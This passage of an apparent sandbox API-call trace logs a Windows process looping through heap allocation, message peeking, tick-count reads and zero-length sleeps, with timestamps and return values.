dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.371] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.371] GetTickCount () returned 0x1d1ee [0066.372] Sleep (dwMilliseconds=0x0) [0066.372] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.372] GetLastError () returned 0x0 [0066.372] GetCurrentProcessId () returned 0xa44 [0066.372] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.372] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.372] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.372] GetTickCount () returned 0x1d1ee [0066.372] GetTickCount () returned 0x1d1ee [0066.372] GetTickCount () returned 0x1d1ee [0066.372] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.372] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.372] GetTickCount () returned 0x1d1ee [0066.372] Sleep (dwMilliseconds=0x0) [0066.372] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.372] GetLastError () returned 0x0 [0066.373] GetCurrentProcessId () returned 0xa44 [0066.373] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.373] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.373] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.373] GetTickCount () returned 0x1d1ee [0066.373] GetTickCount () returned 0x1d1ee [0066.373] GetTickCount () returned 0x1d1ee [0066.373] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.373] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.373] GetTickCount () returned 0x1d1ee [0066.373] Sleep (dwMilliseconds=0x0) [0066.373] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.373] GetLastError () returned 0x0 [0066.373] GetCurrentProcessId () returned 0xa44 [0066.373] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.373] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.373] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.373] GetTickCount () returned 0x1d1ee [0066.374] GetTickCount () returned 0x1d1ee [0066.374] GetTickCount () returned 0x1d1ee [0066.374] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.374] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.374] GetTickCount () returned 0x1d1ee [0066.374] Sleep (dwMilliseconds=0x0) [0066.374] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.374] GetLastError () returned 0x0 [0066.374] GetCurrentProcessId () returned 0xa44 [0066.374] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.374] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.374] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.374] GetTickCount () returned 0x1d1ee [0066.374] GetTickCount () returned 0x1d1ee [0066.374] GetTickCount () returned 0x1d1ee [0066.374] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.374] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.374] GetTickCount () returned 0x1d1ee [0066.375] Sleep (dwMilliseconds=0x0) [0066.375] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.375] GetLastError () returned 0x0 [0066.375] GetCurrentProcessId () returned 0xa44 [0066.375] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.375] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.375] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.375] GetTickCount () returned 0x1d1ee [0066.375] GetTickCount () returned 0x1d1ee [0066.375] GetTickCount () returned 0x1d1fd [0066.375] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.375] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.375] GetTickCount () returned 0x1d1fd [0066.375] Sleep (dwMilliseconds=0x0) [0066.376] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.376] GetLastError () returned 0x0 [0066.376] GetCurrentProcessId () returned 0xa44 [0066.376] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.376] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.376] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.376] GetTickCount () returned 0x1d1fd [0066.376] GetTickCount () returned 0x1d1fd [0066.376] GetTickCount () returned 0x1d1fd [0066.376] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.376] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.376] GetTickCount () returned 0x1d1fd [0066.376] Sleep (dwMilliseconds=0x0) [0066.376] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.376] GetLastError () returned 0x0 [0066.376] GetCurrentProcessId () returned 0xa44 [0066.376] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.376] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.377] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.377] GetTickCount () returned 0x1d1fd [0066.377] GetTickCount () returned 0x1d1fd [0066.377] GetTickCount () returned 0x1d1fd [0066.377] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.377] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.377] GetTickCount () returned 0x1d1fd [0066.377] Sleep (dwMilliseconds=0x0) [0066.377] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.377] GetLastError () returned 0x0 [0066.377] GetCurrentProcessId () returned 0xa44 [0066.377] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.377] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.377] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.377] GetTickCount () returned 0x1d1fd [0066.377] GetTickCount () returned 0x1d1fd [0066.377] GetTickCount () returned 0x1d1fd [0066.377] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.377] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.377] GetTickCount () returned 0x1d1fd [0066.378] Sleep (dwMilliseconds=0x0) [0066.378] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.378] GetLastError () returned 0x0 [0066.378] GetCurrentProcessId () returned 0xa44 [0066.378] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.378] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.378] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.378] GetTickCount () returned 0x1d1fd [0066.378] GetTickCount () returned 0x1d1fd [0066.378] GetTickCount () returned 0x1d1fd [0066.378] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.378] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.378] GetTickCount () returned 0x1d1fd [0066.378] Sleep (dwMilliseconds=0x0) [0066.378] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.378] GetLastError () returned 0x0 [0066.379] GetCurrentProcessId () returned 0xa44 [0066.379] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.379] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.379] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.379] GetTickCount () returned 0x1d1fd [0066.379] GetTickCount () returned 0x1d1fd [0066.379] GetTickCount () returned 0x1d1fd [0066.379] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.379] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.379] GetTickCount () returned 0x1d1fd [0066.379] Sleep (dwMilliseconds=0x0) [0066.379] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.379] GetLastError () returned 0x0 [0066.379] GetCurrentProcessId () returned 0xa44 [0066.379] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.379] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.379] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.379] GetTickCount () returned 0x1d1fd [0066.379] GetTickCount () returned 0x1d1fd [0066.380] GetTickCount () returned 0x1d1fd [0066.380] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.380] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.380] GetTickCount () returned 0x1d1fd [0066.380] Sleep (dwMilliseconds=0x0) [0066.380] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.380] GetLastError () returned 0x0 [0066.380] GetCurrentProcessId () returned 0xa44 [0066.380] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.380] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.380] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.380] GetTickCount () returned 0x1d1fd [0066.380] GetTickCount () returned 0x1d1fd [0066.380] GetTickCount () returned 0x1d1fd [0066.380] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.380] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.380] GetTickCount () returned 0x1d1fd [0066.381] Sleep (dwMilliseconds=0x0) [0066.381] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.381] GetLastError () returned 0x0 [0066.381] GetCurrentProcessId () returned 0xa44 [0066.381] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.381] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.381] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.381] GetTickCount () returned 0x1d1fd [0066.381] GetTickCount () returned 0x1d1fd [0066.381] GetTickCount () returned 0x1d1fd [0066.381] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.381] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.381] GetTickCount () returned 0x1d1fd [0066.381] Sleep (dwMilliseconds=0x0) [0066.381] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.381] GetLastError () returned 0x0 [0066.381] GetCurrentProcessId () returned 0xa44 [0066.381] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.382] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.382] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.382] GetTickCount () returned 0x1d1fd [0066.382] GetTickCount () returned 0x1d1fd [0066.382] GetTickCount () returned 0x1d1fd [0066.382] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.382] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.382] GetTickCount () returned 0x1d1fd [0066.382] Sleep (dwMilliseconds=0x0) [0066.382] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.382] GetLastError () returned 0x0 [0066.382] GetCurrentProcessId () returned 0xa44 [0066.382] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.382] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.382] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.382] GetTickCount () returned 0x1d1fd [0066.382] GetTickCount () returned 0x1d1fd [0066.382] GetTickCount () returned 0x1d1fd [0066.382] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.382] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.383] GetTickCount () returned 0x1d1fd [0066.383] Sleep (dwMilliseconds=0x0) [0066.383] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.383] GetLastError () returned 0x0 [0066.383] GetCurrentProcessId () returned 0xa44 [0066.383] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.383] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.383] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.383] GetTickCount () returned 0x1d1fd [0066.383] GetTickCount () returned 0x1d1fd [0066.383] GetTickCount () returned 0x1d1fd [0066.383] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.383] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.383] GetTickCount () returned 0x1d1fd [0066.383] Sleep (dwMilliseconds=0x0) [0066.383] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.384] GetLastError () returned 0x0 [0066.384] GetCurrentProcessId () returned 0xa44 [0066.384] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.384] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.384] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.384] GetTickCount () returned 0x1d1fd [0066.384] GetTickCount () returned 0x1d1fd [0066.384] GetTickCount () returned 0x1d1fd [0066.384] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.384] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.384] GetTickCount () returned 0x1d1fd [0066.384] Sleep (dwMilliseconds=0x0) [0066.384] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.384] GetLastError () returned 0x0 [0066.384] GetCurrentProcessId () returned 0xa44 [0066.384] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.384] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.385] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.385] GetTickCount () returned 0x1d1fd [0066.385] GetTickCount () returned 0x1d1fd [0066.385] GetTickCount () returned 0x1d1fd [0066.385] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.385] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.385] GetTickCount () returned 0x1d1fd [0066.385] Sleep (dwMilliseconds=0x0) [0066.385] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.385] GetLastError () returned 0x0 [0066.385] GetCurrentProcessId () returned 0xa44 [0066.385] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.385] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.385] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.385] GetTickCount () returned 0x1d1fd [0066.385] GetTickCount () returned 0x1d1fd [0066.385] GetTickCount () returned 0x1d1fd [0066.385] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.385] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.385] GetTickCount () returned 0x1d1fd [0066.386] Sleep (dwMilliseconds=0x0) [0066.386] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.386] GetLastError () returned 0x0 [0066.386] GetCurrentProcessId () returned 0xa44 [0066.386] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.386] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.386] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.386] GetTickCount () returned 0x1d1fd [0066.386] GetTickCount () returned 0x1d1fd [0066.386] GetTickCount () returned 0x1d1fd [0066.386] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.386] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.386] GetTickCount () returned 0x1d1fd [0066.386] Sleep (dwMilliseconds=0x0) [0066.386] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.386] GetLastError () returned 0x0 [0066.387] GetCurrentProcessId () returned 0xa44 [0066.387] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.387] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.387] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.387] GetTickCount () returned 0x1d1fd [0066.387] GetTickCount () returned 0x1d1fd [0066.387] GetTickCount () returned 0x1d1fd [0066.387] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.387] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.387] GetTickCount () returned 0x1d1fd [0066.387] Sleep (dwMilliseconds=0x0) [0066.387] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.387] GetLastError () returned 0x0 [0066.387] GetCurrentProcessId () returned 0xa44 [0066.387] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.387] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.387] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.387] GetTickCount () returned 0x1d1fd [0066.388] GetTickCount () returned 0x1d1fd [0066.388] GetTickCount () returned 0x1d1fd [0066.388] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.388] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.388] GetTickCount () returned 0x1d1fd [0066.388] Sleep (dwMilliseconds=0x0) [0066.388] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.388] GetLastError () returned 0x0 [0066.388] GetCurrentProcessId () returned 0xa44 [0066.388] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.388] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.388] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.388] GetTickCount () returned 0x1d1fd [0066.388] GetTickCount () returned 0x1d1fd [0066.388] GetTickCount () returned 0x1d1fd [0066.388] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.388] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.388] GetTickCount () returned 0x1d1fd [0066.389] Sleep (dwMilliseconds=0x0) [0066.389] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.389] GetLastError () returned 0x0 [0066.389] GetCurrentProcessId () returned 0xa44 [0066.389] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.389] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.389] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.389] GetTickCount () returned 0x1d1fd [0066.389] GetTickCount () returned 0x1d1fd [0066.389] GetTickCount () returned 0x1d1fd [0066.389] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.389] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.389] GetTickCount () returned 0x1d1fd [0066.389] Sleep (dwMilliseconds=0x0) [0066.389] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.389] GetLastError () returned 0x0 [0066.390] GetCurrentProcessId () returned 0xa44 [0066.390] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.390] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.390] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.390] GetTickCount () returned 0x1d1fd [0066.390] GetTickCount () returned 0x1d1fd [0066.390] GetTickCount () returned 0x1d1fd [0066.390] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.390] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.390] GetTickCount () returned 0x1d1fd [0066.390] Sleep (dwMilliseconds=0x0) [0066.390] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.390] GetLastError () returned 0x0 [0066.390] GetCurrentProcessId () returned 0xa44 [0066.390] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.390] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.390] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.390] GetTickCount () returned 0x1d1fd [0066.391] GetTickCount () returned 0x1d1fd [0066.391] GetTickCount () returned 0x1d1fd [0066.391] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.391] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.391] GetTickCount () returned 0x1d1fd [0066.391] Sleep (dwMilliseconds=0x0) [0066.391] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.391] GetLastError () returned 0x0 [0066.391] GetCurrentProcessId () returned 0xa44 [0066.391] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.391] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.391] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.391] GetTickCount () returned 0x1d1fd [0066.391] GetTickCount () returned 0x1d1fd [0066.391] GetTickCount () returned 0x1d1fd [0066.391] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.391] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.391] GetTickCount () returned 0x1d1fd [0066.392] Sleep (dwMilliseconds=0x0) [0066.392] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.392] GetLastError () returned 0x0 [0066.392] GetCurrentProcessId () returned 0xa44 [0066.392] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.392] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.392] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.392] GetTickCount () returned 0x1d1fd [0066.392] 